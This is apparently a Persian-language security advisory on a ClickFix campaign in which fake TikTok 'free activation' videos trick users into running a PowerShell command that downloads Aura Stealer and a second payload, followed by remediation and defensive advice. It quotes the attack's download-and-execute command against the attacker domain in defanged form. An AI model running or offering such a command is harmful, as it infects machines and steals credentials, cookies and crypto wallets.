هکرها از ویدیوهای آموزشی جعلی در TikTok (جعل آموزش «فعالسازی رایگان» نرمافزارها) برای فریب کاربران و اجرای دستورات مخرب در PowerShell استفاده میکنند. این روش، نوعی حملهٔ مهندسی اجتماعی بهنام ClickFix است که با دانلود بدافزارهای سرقتکنندهٔ اطلاعات مانند Aura Stealer، اطلاعات مرورگر، کوکیها، کیفپولهای رمزارز و سایر دادههای حساس را میدزدد. اگر چنین دستوری اجرا شده، باید فوراً رمزها ریست و اقدامهای مقابلهای انجام شود.
شرح کامل حمله به زبان ساده
پژوهشگران امنیتی از جمله Xavier Mertens (ISC) و گزارشهایی از Trend Micro، کمپینی را رصد کردهاند که در آن مهاجمان ویدیوهای TikTok منتشر میکنند و در ظاهر آموزشهایی برای «فعالسازی رایگان» یا «دسترسی پرمیوم» نرمافزارهای شناختهشده ارائه میدهند. هدف این ویدیوها فریب کاربران برای اجرای یک خط دستور ساده در PowerShell با سطح دسترسی Administrator است.
نمونهٔ فرمان نمایشدادهشده
در بخشی از ویدیو فرمانی شبیه زیر به نمایش درمیآید و مخاطب را تشویق میکند آن را اجرا کند:
iex (irm slmgr[.]win/photoshop)
بخش انتهایی آدرس (مثلاً photoshop) بسته به نرمافزاری که ویدیو آن را تقلید میکند تغییر میکند؛ مثلاً برای فعالسازی ویندوز همانجا windows خواهد آمد.
با اجرای این فرمان، PowerShell به دامنهٔ مهاجم (slmgr[.]win) متصل شده و اسکریپت مخربی را دریافت و اجرا میکند. این اسکریپت به نوبهٔ خود دو فایل اجرایی را از صفحات Cloudflare دانلود میکند:
updater.exe— نسخهای از Aura Stealer (بدافزار سرقتکنندهٔ اطلاعات)؛source.exe— payload دوم که با استفاده از کامپایلر داخلی .NET (csc.exe) کد را خودکامپایل میکند و سپس آن را در حافظه تزریق و اجرا مینماید. هدف دقیق این ماژول دوم هنوز مشخص نیست.
چه اطلاعاتی به سرقت میرود؟
بدافزارهایی مثل Aura Stealer معمولاً قادرند موارد زیر را استخراج کنند:
رمزها و نامکاربریهای ذخیرهشده در مرورگرها
کوکیها و توکنهای احراز هویت
اطلاعات کیفپولهای رمزارز و افزونههای کیفپول
دادههای برنامههای پیامرسان و سایر اپها
اگر این فرمان را اجرا کردهاید، فرض را بر این بگذارید که همهٔ اعتبارنامهها و توکنهای ذخیرهشده در دستگاه در معرض خطر هستند.
ClickFix چیست؟
ClickFix یک تاکتیک مهندسی اجتماعی است که مهاجم «ترمیم» یا «دستور اصلاح» (fix)ای را ارائه میدهد که به نظر بیضرر میآید، اما قربانی را به اجرای یک فرمان در محیط شِل مانند PowerShell ترغیب میکند؛ پس از اجرا، بدافزار دانلود و فعال میشود.
پیامدها و خطرات
اجرای دستوری ساده میتواند منجر به آلودهشدن کامل سیستم و افشای حسابها شود.
مهاجم ممکن است به حسابهای ایمیل، سرویسهای ابری، حسابهای بانکی یا کیفپول رمزارز دسترسی پیدا کند.
در محیطهای سازمانی، یک دستگاه آلوده میتواند نقطهٔ ورود برای حملات گستردهتر (lateral movement) شود.
راهکارهای فوری و عملی (برای کاربران و سازمانها)
هرگز دستوری را که از ویدیو/سایت/پیام ناشناس آمده، کپی و در PowerShell یا هر ترمینال دیگر اجرا نکنید.
اگر ناخواسته اجرای دستور انجام شده:
فوراً رمزهای همهٔ حسابهای مهم را تغییر دهید.
نشستهای فعال (sessions) را از طریق وبسایت سرویسها خاتمه دهید.
مرورگر را پاک (clear cache & cookies) کنید و اگر ممکن است OTPها/توکنها را ریست کنید.
دستگاه را آفلاین کنید و با آنتیویروس/EDR اسکن عمیق انجام دهید.
در سازمانها: تیم امنیتی (SOC/IR) را فوراً مطلع کنید و فرایندهای فورنزیک را آغاز نمایید.
آموزش کاربران: نمونههای ClickFix و ترفندهای مشابه را در دورههای آگاهیرسانی امنیتی بگنجانید.
محدودیت اجرایی: از سیاستهای کنترل اجرا (Application Control) و جلوگیری از اجرای اسکریپتهای ناشناس استفاده کنید.
تشخیص رفتاری: ابزارهای تشخیص مبتنی بر رفتار روی endpointها و مانیتورینگ شبکه میتوانند رفتارهای مشکوک اسکریپتی را شناسایی کنند.
نتیجهگیری
کمپین اخیر نشان میدهد مهاجمان از شبکههای اجتماعی محبوب مانند TikTok برای فریب کاربران و اجرای حملات ClickFix استفاده میکنند. حتی یک دستور سادهٔ PowerShell که در ظاهر بیخطر به نظر میرسد میتواند باعث دانلود بدافزار سرقتکنندهٔ اطلاعات (infostealer) و افشای گستردهٔ دادهها شود. بهترین دفاع فعلاً آموزش کاربران، محدودسازی اجرای اسکریپت و بکارگیری راهکارهای تشخیص رفتاری است.
